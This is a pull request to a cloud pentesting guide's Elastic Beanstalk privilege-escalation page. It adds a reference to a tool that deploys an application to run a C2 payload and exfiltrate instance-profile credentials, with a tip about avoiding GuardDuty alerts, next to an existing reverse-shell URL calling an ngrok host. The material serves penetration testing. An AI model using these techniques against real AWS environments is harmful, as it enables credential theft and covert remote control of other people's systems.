### PR TITLE
Add malicious beanstalk reference

### DIFF
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md
@@ -194,6 +194,10 @@ aws elasticbeanstalk update-environment --environment-name MyEnv --version-label
 
 # To get your rev shell just access the exposed web URL with params such as:
 http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
+
+Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance). 
+
+The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. 
 ```
 {% endcode %}
 


### PR DESCRIPTION
Added reference to a tool I own called malicious beanstalk. It is useful for beanstalk priv esc and offers a cradle for executing a C2 payload or exfiltrating the instance profile creds. Soon to add reverse shell similar functionality to what you arleady have included in your poc. 